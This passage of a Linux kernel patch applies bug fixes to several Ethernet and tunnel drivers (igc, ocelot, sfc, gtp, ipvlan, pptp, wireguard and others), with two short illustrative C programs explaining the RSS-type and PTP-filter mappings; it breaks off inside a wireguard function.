+--- a/drivers/net/ethernet/intel/ice/ice_ptp.h
++++ b/drivers/net/ethernet/intel/ice/ice_ptp.h
+@@ -159,7 +159,6 @@ struct ice_ptp_port {
+  * struct ice_ptp - data used for integrating with CONFIG_PTP_1588_CLOCK
+  * @port: data for the PHY port initialization procedure
+  * @work: delayed work function for periodic tasks
+- * @extts_work: work function for handling external Tx timestamps
+  * @cached_phc_time: a cached copy of the PHC time for timestamp extension
+  * @cached_phc_jiffies: jiffies when cached_phc_time was last updated
+  * @ext_ts_chan: the external timestamp channel in use
+@@ -180,7 +179,6 @@ struct ice_ptp_port {
+ struct ice_ptp {
+ 	struct ice_ptp_port port;
+ 	struct kthread_delayed_work work;
+-	struct kthread_work extts_work;
+ 	u64 cached_phc_time;
+ 	unsigned long cached_phc_jiffies;
+ 	u8 ext_ts_chan;
+@@ -246,6 +244,7 @@ int ice_ptp_get_ts_config(struct ice_pf *pf, struct ifreq *ifr);
+ void ice_ptp_cfg_timestamp(struct ice_pf *pf, bool ena);
+ int ice_get_ptp_clock_index(struct ice_pf *pf);
+ 
++void ice_ptp_extts_event(struct ice_pf *pf);
+ s8 ice_ptp_request_ts(struct ice_ptp_tx *tx, struct sk_buff *skb);
+ bool ice_ptp_process_ts(struct ice_pf *pf);
+ 
+@@ -274,6 +273,7 @@ static inline int ice_get_ptp_clock_index(struct ice_pf *pf)
+ 	return -1;
+ }
+ 
++static inline void ice_ptp_extts_event(struct ice_pf *pf) { }
+ static inline s8
+ ice_ptp_request_ts(struct ice_ptp_tx *tx, struct sk_buff *skb)
+ {
+diff --git a/drivers/net/ethernet/intel/igc/igc.h b/drivers/net/ethernet/intel/igc/igc.h
+index df3e26c0cf01a..f83cbc4a1afa8 100644
+--- a/drivers/net/ethernet/intel/igc/igc.h
++++ b/drivers/net/ethernet/intel/igc/igc.h
+@@ -13,6 +13,7 @@
+ #include <linux/ptp_clock_kernel.h>
+ #include <linux/timecounter.h>
+ #include <linux/net_tstamp.h>
++#include <linux/bitfield.h>
+ 
+ #include "igc_hw.h"
+ 
+@@ -311,6 +312,33 @@ extern char igc_driver_name[];
+ #define IGC_MRQC_RSS_FIELD_IPV4_UDP	0x00400000
+ #define IGC_MRQC_RSS_FIELD_IPV6_UDP	0x00800000
+ 
++/* RX-desc Write-Back format RSS Type's */
++enum igc_rss_type_num {
++	IGC_RSS_TYPE_NO_HASH		= 0,
++	IGC_RSS_TYPE_HASH_TCP_IPV4	= 1,
++	IGC_RSS_TYPE_HASH_IPV4		= 2,
++	IGC_RSS_TYPE_HASH_TCP_IPV6	= 3,
++	IGC_RSS_TYPE_HASH_IPV6_EX	= 4,
++	IGC_RSS_TYPE_HASH_IPV6		= 5,
++	IGC_RSS_TYPE_HASH_TCP_IPV6_EX	= 6,
++	IGC_RSS_TYPE_HASH_UDP_IPV4	= 7,
++	IGC_RSS_TYPE_HASH_UDP_IPV6	= 8,
++	IGC_RSS_TYPE_HASH_UDP_IPV6_EX	= 9,
++	IGC_RSS_TYPE_MAX		= 10,
++};
++#define IGC_RSS_TYPE_MAX_TABLE		16
++#define IGC_RSS_TYPE_MASK		GENMASK(3,0) /* 4-bits (3:0) = mask 0x0F */
++
++/* igc_rss_type - Rx descriptor RSS type field */
++static inline u32 igc_rss_type(const union igc_adv_rx_desc *rx_desc)
++{
++	/* RSS Type 4-bits (3:0) number: 0-9 (above 9 is reserved)
++	 * Accessing the same bits via u16 (wb.lower.lo_dword.hs_rss.pkt_info)
++	 * is slightly slower than via u32 (wb.lower.lo_dword.data)
++	 */
++	return le32_get_bits(rx_desc->wb.lower.lo_dword.data, IGC_RSS_TYPE_MASK);
++}
++
+ /* Interrupt defines */
+ #define IGC_START_ITR			648 /* ~6000 ints/sec */
+ #define IGC_4K_ITR			980
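
igc_rss_type() is a 4-bit field extraction from the descriptor's little-endian lower dword; igc_main.c then maps that number to a pkt_hash_types value through a 16-entry table so reserved types fall through to NONE. The arithmetic, assuming the dword has already been byte-swapped to CPU order:

#include <stdint.h>
#include <stdio.h>

#define IGC_RSS_TYPE_MASK 0x0F

static const char *hash_type[16] = {
	[0] = "L2", [1] = "L4", [2] = "L3", [3] = "L4", [4] = "L3",
	[5] = "L3", [6] = "L4", [7] = "L4", [8] = "L4", [9] = "L4",
	/* 10..15 reserved by HW -> reported as NONE */
};

int main(void)
{
	uint32_t lo_dword = 0x00000007; /* UDP/IPv4 descriptor, CPU-endian */
	uint32_t rss_type = lo_dword & IGC_RSS_TYPE_MASK;

	printf("rss_type %u -> PKT_HASH_TYPE_%s\n", rss_type,
	       hash_type[rss_type] ? hash_type[rss_type] : "NONE");
	return 0;
}
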
+diff --git a/drivers/net/ethernet/intel/igc/igc_main.c b/drivers/net/ethernet/intel/igc/igc_main.c
+index 3509974c1f8e4..b67a6a81474f5 100644
+--- a/drivers/net/ethernet/intel/igc/igc_main.c
++++ b/drivers/net/ethernet/intel/igc/igc_main.c
+@@ -1684,14 +1684,36 @@ static void igc_rx_checksum(struct igc_ring *ring,
+ 		   le32_to_cpu(rx_desc->wb.upper.status_error));
+ }
+ 
++/* Mapping HW RSS Type to enum pkt_hash_types */
++static const enum pkt_hash_types igc_rss_type_table[IGC_RSS_TYPE_MAX_TABLE] = {
++	[IGC_RSS_TYPE_NO_HASH]		= PKT_HASH_TYPE_L2,
++	[IGC_RSS_TYPE_HASH_TCP_IPV4]	= PKT_HASH_TYPE_L4,
++	[IGC_RSS_TYPE_HASH_IPV4]	= PKT_HASH_TYPE_L3,
++	[IGC_RSS_TYPE_HASH_TCP_IPV6]	= PKT_HASH_TYPE_L4,
++	[IGC_RSS_TYPE_HASH_IPV6_EX]	= PKT_HASH_TYPE_L3,
++	[IGC_RSS_TYPE_HASH_IPV6]	= PKT_HASH_TYPE_L3,
++	[IGC_RSS_TYPE_HASH_TCP_IPV6_EX] = PKT_HASH_TYPE_L4,
++	[IGC_RSS_TYPE_HASH_UDP_IPV4]	= PKT_HASH_TYPE_L4,
++	[IGC_RSS_TYPE_HASH_UDP_IPV6]	= PKT_HASH_TYPE_L4,
++	[IGC_RSS_TYPE_HASH_UDP_IPV6_EX] = PKT_HASH_TYPE_L4,
++	[10] = PKT_HASH_TYPE_NONE, /* RSS Type above 9 "Reserved" by HW  */
++	[11] = PKT_HASH_TYPE_NONE, /* keep array sized for SW bit-mask   */
++	[12] = PKT_HASH_TYPE_NONE, /* to handle future HW revisions      */
++	[13] = PKT_HASH_TYPE_NONE,
++	[14] = PKT_HASH_TYPE_NONE,
++	[15] = PKT_HASH_TYPE_NONE,
++};
++
+ static inline void igc_rx_hash(struct igc_ring *ring,
+ 			       union igc_adv_rx_desc *rx_desc,
+ 			       struct sk_buff *skb)
+ {
+-	if (ring->netdev->features & NETIF_F_RXHASH)
+-		skb_set_hash(skb,
+-			     le32_to_cpu(rx_desc->wb.lower.hi_dword.rss),
+-			     PKT_HASH_TYPE_L3);
++	if (ring->netdev->features & NETIF_F_RXHASH) {
++		u32 rss_hash = le32_to_cpu(rx_desc->wb.lower.hi_dword.rss);
++		u32 rss_type = igc_rss_type(rx_desc);
++
++		skb_set_hash(skb, rss_hash, igc_rss_type_table[rss_type]);
++	}
+ }
+ 
+ static void igc_rx_vlan(struct igc_ring *rx_ring,
+@@ -6518,6 +6540,7 @@ static int igc_probe(struct pci_dev *pdev,
+ 	netdev->features |= NETIF_F_TSO;
+ 	netdev->features |= NETIF_F_TSO6;
+ 	netdev->features |= NETIF_F_TSO_ECN;
++	netdev->features |= NETIF_F_RXHASH;
+ 	netdev->features |= NETIF_F_RXCSUM;
+ 	netdev->features |= NETIF_F_HW_CSUM;
+ 	netdev->features |= NETIF_F_SCTP_CRC;
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/cgx.c b/drivers/net/ethernet/marvell/octeontx2/af/cgx.c
+index afdddfced7e69..65c0373d34d12 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/cgx.c
++++ b/drivers/net/ethernet/marvell/octeontx2/af/cgx.c
+@@ -167,6 +167,9 @@ void cgx_lmac_write(int cgx_id, int lmac_id, u64 offset, u64 val)
+ {
+ 	struct cgx *cgx_dev = cgx_get_pdata(cgx_id);
+ 
++	/* Software must not access disabled LMAC registers */
++	if (!is_lmac_valid(cgx_dev, lmac_id))
++		return;
+ 	cgx_write(cgx_dev, lmac_id, offset, val);
+ }
+ 
+@@ -174,6 +177,10 @@ u64 cgx_lmac_read(int cgx_id, int lmac_id, u64 offset)
+ {
+ 	struct cgx *cgx_dev = cgx_get_pdata(cgx_id);
+ 
++	/* Software must not access disabled LMAC registers */
++	if (!is_lmac_valid(cgx_dev, lmac_id))
++		return 0;
++
+ 	return cgx_read(cgx_dev, lmac_id, offset);
+ }
+ 
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/rvu.h b/drivers/net/ethernet/marvell/octeontx2/af/rvu.h
+index d493b533cf76e..a3346ea7876c5 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/rvu.h
++++ b/drivers/net/ethernet/marvell/octeontx2/af/rvu.h
+@@ -23,6 +23,7 @@
+ #define	PCI_DEVID_OCTEONTX2_LBK			0xA061
+ 
+ /* Subsystem Device ID */
++#define PCI_SUBSYS_DEVID_98XX                  0xB100
+ #define PCI_SUBSYS_DEVID_96XX                  0xB200
+ #define PCI_SUBSYS_DEVID_CN10K_A	       0xB900
+ #define PCI_SUBSYS_DEVID_CNF10K_B              0xBC00
+@@ -646,6 +647,16 @@ static inline u16 rvu_nix_chan_cpt(struct rvu *rvu, u8 chan)
+ 	return rvu->hw->cpt_chan_base + chan;
+ }
+ 
++static inline bool is_rvu_supports_nix1(struct rvu *rvu)
++{
++	struct pci_dev *pdev = rvu->pdev;
++
++	if (pdev->subsystem_device == PCI_SUBSYS_DEVID_98XX)
++		return true;
++
++	return false;
++}
++
+ /* Function Prototypes
+  * RVU
+  */
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/rvu_cgx.c b/drivers/net/ethernet/marvell/octeontx2/af/rvu_cgx.c
+index 9eca38547b783..c60b9580ca969 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/rvu_cgx.c
++++ b/drivers/net/ethernet/marvell/octeontx2/af/rvu_cgx.c
+@@ -112,7 +112,7 @@ static void rvu_map_cgx_nix_block(struct rvu *rvu, int pf,
+ 	p2x = cgx_lmac_get_p2x(cgx_id, lmac_id);
+ 	/* Firmware sets P2X_SELECT as either NIX0 or NIX1 */
+ 	pfvf->nix_blkaddr = BLKADDR_NIX0;
+-	if (p2x == CMR_P2X_SEL_NIX1)
++	if (is_rvu_supports_nix1(rvu) && p2x == CMR_P2X_SEL_NIX1)
+ 		pfvf->nix_blkaddr = BLKADDR_NIX1;
+ }
+ 
+@@ -751,7 +751,7 @@ static int rvu_cgx_ptp_rx_cfg(struct rvu *rvu, u16 pcifunc, bool enable)
+ 	cgxd = rvu_cgx_pdata(cgx_id, rvu);
+ 
+ 	mac_ops = get_mac_ops(cgxd);
+-	mac_ops->mac_enadis_ptp_config(cgxd, lmac_id, true);
++	mac_ops->mac_enadis_ptp_config(cgxd, lmac_id, enable);
+ 	/* If PTP is enabled then inform NPC that packets to be
+ 	 * parsed by this PF will have their data shifted by 8 bytes
+ 	 * and if PTP is disabled then no shift is required
+diff --git a/drivers/net/ethernet/mellanox/mlxsw/minimal.c b/drivers/net/ethernet/mellanox/mlxsw/minimal.c
+index 55b3c42bb0071..15116d9305f8e 100644
+--- a/drivers/net/ethernet/mellanox/mlxsw/minimal.c
++++ b/drivers/net/ethernet/mellanox/mlxsw/minimal.c
+@@ -430,6 +430,7 @@ static int mlxsw_m_linecards_init(struct mlxsw_m *mlxsw_m)
+ err_kmalloc_array:
+ 	for (i--; i >= 0; i--)
+ 		kfree(mlxsw_m->line_cards[i]);
++	kfree(mlxsw_m->line_cards);
+ err_kcalloc:
+ 	kfree(mlxsw_m->ports);
+ 	return err;
+diff --git a/drivers/net/ethernet/mscc/ocelot.c b/drivers/net/ethernet/mscc/ocelot.c
+index 13b14110a0603..01b6e13f4692f 100644
+--- a/drivers/net/ethernet/mscc/ocelot.c
++++ b/drivers/net/ethernet/mscc/ocelot.c
+@@ -2728,7 +2728,6 @@ int ocelot_init(struct ocelot *ocelot)
+ 		}
+ 	}
+ 
+-	mutex_init(&ocelot->ptp_lock);
+ 	mutex_init(&ocelot->mact_lock);
+ 	mutex_init(&ocelot->fwd_domain_lock);
+ 	mutex_init(&ocelot->tas_lock);
+diff --git a/drivers/net/ethernet/mscc/ocelot_ptp.c b/drivers/net/ethernet/mscc/ocelot_ptp.c
+index 2180ae94c7447..cb32234a5bf1b 100644
+--- a/drivers/net/ethernet/mscc/ocelot_ptp.c
++++ b/drivers/net/ethernet/mscc/ocelot_ptp.c
+@@ -439,8 +439,12 @@ static int ocelot_ipv6_ptp_trap_del(struct ocelot *ocelot, int port)
+ static int ocelot_setup_ptp_traps(struct ocelot *ocelot, int port,
+ 				  bool l2, bool l4)
+ {
++	struct ocelot_port *ocelot_port = ocelot->ports[port];
+ 	int err;
+ 
++	ocelot_port->trap_proto &= ~(OCELOT_PROTO_PTP_L2 |
++				     OCELOT_PROTO_PTP_L4);
++
+ 	if (l2)
+ 		err = ocelot_l2_ptp_trap_add(ocelot, port);
+ 	else
+@@ -464,6 +468,11 @@ static int ocelot_setup_ptp_traps(struct ocelot *ocelot, int port,
+ 	if (err)
+ 		return err;
+ 
++	if (l2)
++		ocelot_port->trap_proto |= OCELOT_PROTO_PTP_L2;
++	if (l4)
++		ocelot_port->trap_proto |= OCELOT_PROTO_PTP_L4;
++
+ 	return 0;
+ 
+ err_ipv6:
+@@ -474,10 +483,38 @@ err_ipv4:
+ 	return err;
+ }
+ 
++static int ocelot_traps_to_ptp_rx_filter(unsigned int proto)
++{
++	if ((proto & OCELOT_PROTO_PTP_L2) && (proto & OCELOT_PROTO_PTP_L4))
++		return HWTSTAMP_FILTER_PTP_V2_EVENT;
++	else if (proto & OCELOT_PROTO_PTP_L2)
++		return HWTSTAMP_FILTER_PTP_V2_L2_EVENT;
++	else if (proto & OCELOT_PROTO_PTP_L4)
++		return HWTSTAMP_FILTER_PTP_V2_L4_EVENT;
++
++	return HWTSTAMP_FILTER_NONE;
++}
++
+ int ocelot_hwstamp_get(struct ocelot *ocelot, int port, struct ifreq *ifr)
+ {
+-	return copy_to_user(ifr->ifr_data, &ocelot->hwtstamp_config,
+-			    sizeof(ocelot->hwtstamp_config)) ? -EFAULT : 0;
++	struct ocelot_port *ocelot_port = ocelot->ports[port];
++	struct hwtstamp_config cfg = {};
++
++	switch (ocelot_port->ptp_cmd) {
++	case IFH_REW_OP_TWO_STEP_PTP:
++		cfg.tx_type = HWTSTAMP_TX_ON;
++		break;
++	case IFH_REW_OP_ORIGIN_PTP:
++		cfg.tx_type = HWTSTAMP_TX_ONESTEP_SYNC;
++		break;
++	default:
++		cfg.tx_type = HWTSTAMP_TX_OFF;
++		break;
++	}
++
++	cfg.rx_filter = ocelot_traps_to_ptp_rx_filter(ocelot_port->trap_proto);
++
++	return copy_to_user(ifr->ifr_data, &cfg, sizeof(cfg)) ? -EFAULT : 0;
+ }
+ EXPORT_SYMBOL(ocelot_hwstamp_get);
+ 
+@@ -509,8 +546,6 @@ int ocelot_hwstamp_set(struct ocelot *ocelot, int port, struct ifreq *ifr)
+ 		return -ERANGE;
+ 	}
+ 
+-	mutex_lock(&ocelot->ptp_lock);
+-
+ 	switch (cfg.rx_filter) {
+ 	case HWTSTAMP_FILTER_NONE:
+ 		break;
+@@ -531,28 +566,14 @@ int ocelot_hwstamp_set(struct ocelot *ocelot, int port, struct ifreq *ifr)
+ 		l4 = true;
+ 		break;
+ 	default:
+-		mutex_unlock(&ocelot->ptp_lock);
+ 		return -ERANGE;
+ 	}
+ 
+ 	err = ocelot_setup_ptp_traps(ocelot, port, l2, l4);
+-	if (err) {
+-		mutex_unlock(&ocelot->ptp_lock);
++	if (err)
+ 		return err;
+-	}
+ 
+-	if (l2 && l4)
+-		cfg.rx_filter = HWTSTAMP_FILTER_PTP_V2_EVENT;
+-	else if (l2)
+-		cfg.rx_filter = HWTSTAMP_FILTER_PTP_V2_L2_EVENT;
+-	else if (l4)
+-		cfg.rx_filter = HWTSTAMP_FILTER_PTP_V2_L4_EVENT;
+-	else
+-		cfg.rx_filter = HWTSTAMP_FILTER_NONE;
+-
+-	/* Commit back the result & save it */
+-	memcpy(&ocelot->hwtstamp_config, &cfg, sizeof(cfg));
+-	mutex_unlock(&ocelot->ptp_lock);
++	cfg.rx_filter = ocelot_traps_to_ptp_rx_filter(ocelot_port->trap_proto);
+ 
+ 	return copy_to_user(ifr->ifr_data, &cfg, sizeof(cfg)) ? -EFAULT : 0;
+ }
+@@ -824,11 +845,6 @@ int ocelot_init_timestamp(struct ocelot *ocelot,
+ 
+ 	ocelot_write(ocelot, PTP_CFG_MISC_PTP_EN, PTP_CFG_MISC);
+ 
+-	/* There is no device reconfiguration, PTP Rx stamping is always
+-	 * enabled.
+-	 */
+-	ocelot->hwtstamp_config.rx_filter = HWTSTAMP_FILTER_PTP_V2_EVENT;
+-
+ 	return 0;
+ }
+ EXPORT_SYMBOL(ocelot_init_timestamp);
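
After this change the reported rx_filter is derived from which traps are actually installed rather than from a cached config, so the get and set paths cannot disagree. The mapping is a pure function of two flag bits; the sketch below prints the filter names, with the bit values assumed (BIT(0)/BIT(1)) rather than taken from the header:

#include <stdio.h>

#define OCELOT_PROTO_PTP_L2 (1 << 0)  /* assumed encoding */
#define OCELOT_PROTO_PTP_L4 (1 << 1)

static const char *traps_to_rx_filter(unsigned int proto)
{
	if ((proto & OCELOT_PROTO_PTP_L2) && (proto & OCELOT_PROTO_PTP_L4))
		return "HWTSTAMP_FILTER_PTP_V2_EVENT";
	else if (proto & OCELOT_PROTO_PTP_L2)
		return "HWTSTAMP_FILTER_PTP_V2_L2_EVENT";
	else if (proto & OCELOT_PROTO_PTP_L4)
		return "HWTSTAMP_FILTER_PTP_V2_L4_EVENT";
	return "HWTSTAMP_FILTER_NONE";
}

int main(void)
{
	printf("%s\n", traps_to_rx_filter(OCELOT_PROTO_PTP_L2));
	printf("%s\n", traps_to_rx_filter(OCELOT_PROTO_PTP_L2 |
					  OCELOT_PROTO_PTP_L4));
	return 0;
}
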
+diff --git a/drivers/net/ethernet/sfc/ef10.c b/drivers/net/ethernet/sfc/ef10.c
+index b63e47af63655..8c019f382a7f3 100644
+--- a/drivers/net/ethernet/sfc/ef10.c
++++ b/drivers/net/ethernet/sfc/ef10.c
+@@ -1297,8 +1297,10 @@ static void efx_ef10_fini_nic(struct efx_nic *efx)
+ {
+ 	struct efx_ef10_nic_data *nic_data = efx->nic_data;
+ 
++	spin_lock_bh(&efx->stats_lock);
+ 	kfree(nic_data->mc_stats);
+ 	nic_data->mc_stats = NULL;
++	spin_unlock_bh(&efx->stats_lock);
+ }
+ 
+ static int efx_ef10_init_nic(struct efx_nic *efx)
+@@ -1852,9 +1854,14 @@ static size_t efx_ef10_update_stats_pf(struct efx_nic *efx, u64 *full_stats,
+ 
+ 	efx_ef10_get_stat_mask(efx, mask);
+ 
+-	efx_nic_copy_stats(efx, nic_data->mc_stats);
+-	efx_nic_update_stats(efx_ef10_stat_desc, EF10_STAT_COUNT,
+-			     mask, stats, nic_data->mc_stats, false);
++	/* If NIC was fini'd (probably resetting), then we can't read
++	 * updated stats right now.
++	 */
++	if (nic_data->mc_stats) {
++		efx_nic_copy_stats(efx, nic_data->mc_stats);
++		efx_nic_update_stats(efx_ef10_stat_desc, EF10_STAT_COUNT,
++				     mask, stats, nic_data->mc_stats, false);
++	}
+ 
+ 	/* Update derived statistics */
+ 	efx_nic_fix_nodesc_drop_stat(efx,
+diff --git a/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c b/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c
+index 30ce073055785..a07bcb2f5d2e2 100644
+--- a/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c
++++ b/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c
+@@ -7388,12 +7388,6 @@ int stmmac_dvr_remove(struct device *dev)
+ 	netif_carrier_off(ndev);
+ 	unregister_netdev(ndev);
+ 
+-	/* Serdes power down needs to happen after VLAN filter
+-	 * is deleted that is triggered by unregister_netdev().
+-	 */
+-	if (priv->plat->serdes_powerdown)
+-		priv->plat->serdes_powerdown(ndev, priv->plat->bsp_priv);
+-
+ #ifdef CONFIG_DEBUG_FS
+ 	stmmac_exit_fs(ndev);
+ #endif
+diff --git a/drivers/net/ethernet/xilinx/xilinx_axienet_main.c b/drivers/net/ethernet/xilinx/xilinx_axienet_main.c
+index d1d772580da98..d14648558338b 100644
+--- a/drivers/net/ethernet/xilinx/xilinx_axienet_main.c
++++ b/drivers/net/ethernet/xilinx/xilinx_axienet_main.c
+@@ -2043,6 +2043,11 @@ static int axienet_probe(struct platform_device *pdev)
+ 		goto cleanup_clk;
+ 	}
+ 
++	/* Reset core now that clocks are enabled, prior to accessing MDIO */
++	ret = __axienet_device_reset(lp);
++	if (ret)
++		goto cleanup_clk;
++
+ 	/* Autodetect the need for 64-bit DMA pointers.
+ 	 * When the IP is configured for a bus width bigger than 32 bits,
+ 	 * writing the MSB registers is mandatory, even if they are all 0.
+@@ -2097,11 +2102,6 @@ static int axienet_probe(struct platform_device *pdev)
+ 	lp->coalesce_count_tx = XAXIDMA_DFT_TX_THRESHOLD;
+ 	lp->coalesce_usec_tx = XAXIDMA_DFT_TX_USEC;
+ 
+-	/* Reset core now that clocks are enabled, prior to accessing MDIO */
+-	ret = __axienet_device_reset(lp);
+-	if (ret)
+-		goto cleanup_clk;
+-
+ 	ret = axienet_mdio_setup(lp);
+ 	if (ret)
+ 		dev_warn(&pdev->dev,
+diff --git a/drivers/net/gtp.c b/drivers/net/gtp.c
+index 15c7dc82107f4..acb20ad4e37eb 100644
+--- a/drivers/net/gtp.c
++++ b/drivers/net/gtp.c
+@@ -631,7 +631,9 @@ static void __gtp_encap_destroy(struct sock *sk)
+ 			gtp->sk1u = NULL;
+ 		udp_sk(sk)->encap_type = 0;
+ 		rcu_assign_sk_user_data(sk, NULL);
++		release_sock(sk);
+ 		sock_put(sk);
++		return;
+ 	}
+ 	release_sock(sk);
+ }
+diff --git a/drivers/net/ipvlan/ipvlan_core.c b/drivers/net/ipvlan/ipvlan_core.c
+index 2de3bd3b0c278..59e29e08398a0 100644
+--- a/drivers/net/ipvlan/ipvlan_core.c
++++ b/drivers/net/ipvlan/ipvlan_core.c
+@@ -585,7 +585,8 @@ static int ipvlan_xmit_mode_l3(struct sk_buff *skb, struct net_device *dev)
+ 				consume_skb(skb);
+ 				return NET_XMIT_DROP;
+ 			}
+-			return ipvlan_rcv_frame(addr, &skb, true);
++			ipvlan_rcv_frame(addr, &skb, true);
++			return NET_XMIT_SUCCESS;
+ 		}
+ 	}
+ out:
+@@ -611,7 +612,8 @@ static int ipvlan_xmit_mode_l2(struct sk_buff *skb, struct net_device *dev)
+ 					consume_skb(skb);
+ 					return NET_XMIT_DROP;
+ 				}
+-				return ipvlan_rcv_frame(addr, &skb, true);
++				ipvlan_rcv_frame(addr, &skb, true);
++				return NET_XMIT_SUCCESS;
+ 			}
+ 		}
+ 		skb = skb_share_check(skb, GFP_ATOMIC);
+@@ -623,7 +625,8 @@ static int ipvlan_xmit_mode_l2(struct sk_buff *skb, struct net_device *dev)
+ 		 * the skb for the main-dev. At the RX side we just return
+ 		 * RX_PASS for it to be processed further on the stack.
+ 		 */
+-		return dev_forward_skb(ipvlan->phy_dev, skb);
++		dev_forward_skb(ipvlan->phy_dev, skb);
++		return NET_XMIT_SUCCESS;
+ 
+ 	} else if (is_multicast_ether_addr(eth->h_dest)) {
+ 		skb_reset_mac_header(skb);
+diff --git a/drivers/net/ppp/pptp.c b/drivers/net/ppp/pptp.c
+index 0fe78826c8fa4..32183f24e63ff 100644
+--- a/drivers/net/ppp/pptp.c
++++ b/drivers/net/ppp/pptp.c
+@@ -24,6 +24,7 @@
+ #include <linux/in.h>
+ #include <linux/ip.h>
+ #include <linux/rcupdate.h>
++#include <linux/security.h>
+ #include <linux/spinlock.h>
+ 
+ #include <net/sock.h>
+@@ -128,6 +129,23 @@ static void del_chan(struct pppox_sock *sock)
+ 	spin_unlock(&chan_lock);
+ }
+ 
++static struct rtable *pptp_route_output(struct pppox_sock *po,
++					struct flowi4 *fl4)
++{
++	struct sock *sk = &po->sk;
++	struct net *net;
++
++	net = sock_net(sk);
++	flowi4_init_output(fl4, sk->sk_bound_dev_if, sk->sk_mark, 0,
++			   RT_SCOPE_UNIVERSE, IPPROTO_GRE, 0,
++			   po->proto.pptp.dst_addr.sin_addr.s_addr,
++			   po->proto.pptp.src_addr.sin_addr.s_addr,
++			   0, 0, sock_net_uid(net, sk));
++	security_sk_classify_flow(sk, flowi4_to_flowi_common(fl4));
++
++	return ip_route_output_flow(net, fl4, sk);
++}
++
+ static int pptp_xmit(struct ppp_channel *chan, struct sk_buff *skb)
+ {
+ 	struct sock *sk = (struct sock *) chan->private;
+@@ -151,11 +169,7 @@ static int pptp_xmit(struct ppp_channel *chan, struct sk_buff *skb)
+ 	if (sk_pppox(po)->sk_state & PPPOX_DEAD)
+ 		goto tx_error;
+ 
+-	rt = ip_route_output_ports(net, &fl4, NULL,
+-				   opt->dst_addr.sin_addr.s_addr,
+-				   opt->src_addr.sin_addr.s_addr,
+-				   0, 0, IPPROTO_GRE,
+-				   RT_TOS(0), sk->sk_bound_dev_if);
++	rt = pptp_route_output(po, &fl4);
+ 	if (IS_ERR(rt))
+ 		goto tx_error;
+ 
+@@ -438,12 +452,7 @@ static int pptp_connect(struct socket *sock, struct sockaddr *uservaddr,
+ 	po->chan.private = sk;
+ 	po->chan.ops = &pptp_chan_ops;
+ 
+-	rt = ip_route_output_ports(sock_net(sk), &fl4, sk,
+-				   opt->dst_addr.sin_addr.s_addr,
+-				   opt->src_addr.sin_addr.s_addr,
+-				   0, 0,
+-				   IPPROTO_GRE, RT_CONN_FLAGS(sk),
+-				   sk->sk_bound_dev_if);
++	rt = pptp_route_output(po, &fl4);
+ 	if (IS_ERR(rt)) {
+ 		error = -EHOSTUNREACH;
+ 		goto end;
+diff --git a/drivers/net/wireguard/netlink.c b/drivers/net/wireguard/netlink.c
+index 43c8c84e7ea82..6d1bd9f52d02a 100644
+--- a/drivers/net/wireguard/netlink.c
++++ b/drivers/net/wireguard/netlink.c
+@@ -546,6 +546,7 @@ static int wg_set_device(struct sk_buff *skb, struct genl_info *info)
+ 		u8 *private_key = nla_data(info->attrs[WGDEVICE_A_PRIVATE_KEY]);
+ 		u8 public_key[NOISE_PUBLIC_KEY_LEN];
+ 		struct wg_peer *peer, *temp;
++		bool send_staged_packets;
+ 
+ 		if (!crypto_memneq(wg->static_identity.static_private,
+ 				   private_key, NOISE_PUBLIC_KEY_LEN))
+@@ -564,14 +565,17 @@ static int wg_set_device(struct sk_buff *skb, struct genl_info *info)
+ 		}
+ 
+ 		down_write(&wg->static_identity.lock);
+-		wg_noise_set_static_identity_private_key(&wg->static_identity,
+-							 private_key);
+-		list_for_each_entry_safe(peer, temp, &wg->peer_list,
+-					 peer_list) {
++		send_staged_packets = !wg->static_identity.has_identity && netif_running(wg->dev);
++		wg_noise_set_static_identity_private_key(&wg->static_identity, private_key);
++		send_staged_packets = send_staged_packets && wg->static_identity.has_identity;
++
++		wg_cookie_checker_precompute_device_keys(&wg->cookie_checker);
++		list_for_each_entry_safe(peer, temp, &wg->peer_list, peer_list) {
+ 			wg_noise_precompute_static_static(peer);
+ 			wg_noise_expire_current_peer_keypairs(peer);
++			if (send_staged_packets)
++				wg_packet_send_staged_packets(peer);
+ 		}
+-		wg_cookie_checker_precompute_device_keys(&wg->cookie_checker);
+ 		up_write(&wg->static_identity.lock);
+ 	}
+ skip_set_private_key:
+diff --git a/drivers/net/wireguard/queueing.c b/drivers/net/wireguard/queueing.c
+index 8084e7408c0ae..26d235d152352 100644
+--- a/drivers/net/wireguard/queueing.c
++++ b/drivers/net/wireguard/queueing.c
+@@ -28,6 +28,7 @@ int wg_packet_queue_init(struct crypt_queue *queue, work_func_t function,
+ 	int ret;
+ 
+ 	memset(queue, 0, sizeof(*queue));
++	queue->last_cpu = -1;
+ 	ret = ptr_ring_init(&queue->ring, len, GFP_KERNEL);
+ 	if (ret)
+ 		return ret;
+diff --git a/drivers/net/wireguard/queueing.h b/drivers/net/wireguard/queueing.h
+index 583adb37ee1e3..1d4f9196bfe17 100644
+--- a/drivers/net/wireguard/queueing.h
++++ b/drivers/net/wireguard/queueing.h
+@@ -117,20 +117,17 @@ static inline int wg_cpumask_choose_online(int *stored_cpu, unsigned int id)
+ 	return cpu;
+ }
+ 
+-/* This function is racy, in the sense that next is unlocked, so it could return
+- * the same CPU twice. A race-free version of this would be to instead store an
+- * atomic sequence number, do an increment-and-return, and then iterate through
+- * every possible CPU until we get to that index -- choose_cpu. However that's
+- * a bit slower, and it doesn't seem like this potential race actually
+- * introduces any performance loss, so we live with it.
++/* This function is racy, in the sense that it's called while last_cpu is
++ * unlocked, so it could return the same CPU twice. Adding locking or using
++ * atomic sequence numbers is slower though, and the consequences of racing are
++ * harmless, so live with it.
+  */
+-static inline int wg_cpumask_next_online(int *next)
++static inline int wg_cpumask_next_online(int *last_cpu)
+ {
+-	int cpu = *next;
+-
+-	while (unlikely(!cpumask_test_cpu(cpu, cpu_online_mask)))
+-		cpu = cpumask_next(cpu, cpu_online_mask) % nr_cpumask_bits;
+-	*next = cpumask_next(cpu, cpu_online_mask) % nr_cpumask_bits;
++	int cpu = cpumask_next(*last_cpu, cpu_online_mask);
++	if (cpu >= nr_cpu_ids)
